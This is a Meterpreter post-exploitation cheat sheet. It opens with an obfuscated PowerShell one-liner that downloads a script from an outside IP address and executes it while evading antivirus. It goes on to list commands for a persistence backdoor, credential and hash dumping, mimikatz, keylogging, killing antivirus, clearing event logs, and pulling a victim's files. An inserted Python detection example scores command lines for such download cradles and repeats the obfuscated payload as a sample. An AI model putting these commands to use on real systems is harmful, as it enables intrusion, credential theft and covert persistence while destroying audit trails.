# meterpreter

METERPRETER Turning Meterpreter into PowerShell

post/windows/manage/payload\_inject

windows exec payload example with AV bypassing payload

powershell.exe "(New-Object Net.WebClient).(((((New-Object Net.WebClient)).PsObject.Methods)|Where-Object{$_.Name-ilike'*nl*g'}).Name).Invoke('<http://74.134.249.8/test.ps1>') | IEX"
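The one-liner above never spells out `DownloadString`; it recovers the method name at run time by wildcard-matching the WebClient object's own method list, so a scanner that only looks for the literal method name misses it. The following added detection example (not part of the original notes) scores process-creation command lines on the pieces that survive that trick; the sample command lines and the `192.0.2.10` address are constructed for the example.

```python
import re

# Indicators of a PowerShell download-and-execute cradle. The reflective
# variant hides "DownloadString" but still needs Net.WebClient, a method
# lookup via PsObject.Methods, a wildcard name match, a dynamic .Invoke(),
# a URL and an IEX to run what was fetched.
INDICATORS = {
    "webclient":         re.compile(r"Net\.WebClient", re.I),
    "reflective_lookup": re.compile(r"PsObject\.Methods", re.I),
    "wildcard_name":     re.compile(r"-i?like\s*['\"][^'\"]*\*[^'\"]*['\"]", re.I),
    "dynamic_invoke":    re.compile(r"\)\s*\.Invoke\s*\(", re.I),
    "remote_url":        re.compile(r"https?://[^\s'\"()<>]+", re.I),
    "iex":               re.compile(r"\bIEX\b|Invoke-Expression", re.I),
}

def score_cmdline(cmdline: str) -> dict:
    """Return which indicators fire on one process command line and a verdict."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    # A bare URL or a bare IEX is too common to alert on; the cradle needs
    # both a downloader and execution of the downloaded content.
    cradle = "webclient" in hits and "iex" in hits
    # Method-name lookup through PsObject.Methods is the evasion signature.
    obfuscated = cradle and "reflective_lookup" in hits
    return {"hits": hits, "cradle": cradle, "obfuscated": obfuscated}

# Constructed sample process-creation command lines (not real telemetry).
SAMPLE_CMDLINES = [
    # Plain cradle: the method name is present as a literal.
    "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://192.0.2.10/a.ps1')\"",
    # Reflective cradle in the style of the note above: name resolved via Where-Object.
    "powershell.exe \"(New-Object Net.WebClient).(((((New-Object Net.WebClient))"
    ".PsObject.Methods)|Where-Object{$_.Name-ilike'*nl*g'}).Name)"
    ".Invoke('http://192.0.2.10/test.ps1') | IEX\"",
    # Benign administrative use of Where-Object.
    "powershell.exe -Command Get-Service | Where-Object {$_.Status -eq 'Running'}",
]

def triage(cmdlines):
    """Score a batch of command lines; returns one verdict dict per line."""
    return [score_cmdline(c) for c in cmdlines]

if __name__ == "__main__":
    for line, verdict in zip(SAMPLE_CMDLINES, triage(SAMPLE_CMDLINES)):
        print(verdict["cradle"], verdict["obfuscated"], verdict["hits"], line[:60])
```

The `obfuscated` verdict is the one worth alerting on with high confidence; the plain `cradle` verdict should be tuned against the environment's legitimate scripted downloads.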

**To keep the shell from dying:** set all multi/handler options first; then, before actually running the multi/handler, type the following for persistence:

exec cmd.exe -f -h

set autorunscript explorer.exe

set autorunscript migrate -f

run post/windows/manage/migrate

run persistence <--for a back door

run post/windows/gather/credentials/gpp <--get group policy creds

run getgui <--enable rdp

clearev <--clear event log

run post/windows/capture/keylog_recorder <--record keystrokes

run killav <-- kill anti virus

run vnc <-- get a gui :)

run hashdump <--dump system hashes

run post/windows/gather/dumplinks <---gather link files that may be useful

run post/windows/gather/enum_applications <--enumerate applications

load mimikatz <----- load the mimikatz extension (i.e. password dumps etc.)

getsystem <------escalate privs

run post/windows/gather/credentials/mssql_local_hashdump <--dump database hashes

run winenum <----enumerate system in meterpreter (files get stored in .msf4 or .msf8)

run post/windows/gather/win_privs <---check if you are an admin

run post/multi/recon/local_exploit_suggester <----check for privilege escalation

run post/windows/gather/credentials/credential_collector

run post/windows/gather/enum_ms_product_keys

execute -f cmd.exe -i -H <-----run commands in meterpreter

meterpreter > download C:\bank-account.zip /root/Desktop/bank-account.zip
[*] downloading: C:\bank-account.zip -> /root/Desktop/bank-account.zip
[*] download : C:\bank-account.zip -> /root/Desktop/bank-account.zip

portfwd add -l 1234 -p 445 -r 10.11.1.14 <-- -l is my local port, -p is their (remote) port, and -r is the victim's IP address
